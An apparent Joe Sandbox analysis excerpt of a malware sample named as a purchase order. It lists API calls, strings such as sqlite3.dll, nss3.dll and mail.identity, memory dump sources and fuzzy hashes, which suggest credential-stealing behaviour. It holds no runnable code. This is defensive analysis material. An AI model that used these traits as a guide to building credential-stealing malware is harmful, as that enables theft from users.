• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
• Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
• Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
• Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: _strcmpi
• String ID: C@$mail.identity
• API String ID: 1439213657-721921413
• Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
• Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
• Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
• Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
APIs
• memset.MSVCRT ref: 00406640
  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
• memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
• memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: memcpy$memset$memcmp
• String ID: Ul@
• API String ID: 270934217-715280498
• Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
• Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
• Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
• Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
APIs
  • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
Strings
• recovered %d pages from %s, xrefs: 004188B4
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
• String ID: recovered %d pages from %s
• API String ID: 985450955-1623757624
• Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
• Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
• Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
• Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
• Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
• Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
• Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
• Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
APIs
• LoadMenuA.USER32(00000000), ref: 00409078
• sprintf.MSVCRT ref: 0040909B
  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
• String ID: menu_%d
• API String ID: 1129539653-2417748251
• Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
• Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
• Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
• Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                      • String ID: sqlite3.dll
                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                      • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                      • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow
                                                                                                      • String ID: MZ@
                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                      • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                      • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                      • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                      • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString
                                                                                                      • String ID: A4@$Server Details
                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,75B4EB20,?,00000000), ref: 0040858F
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,75B4EB20,?,00000000), ref: 004085BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3110682361-0
                                                                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3510742995-0
                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8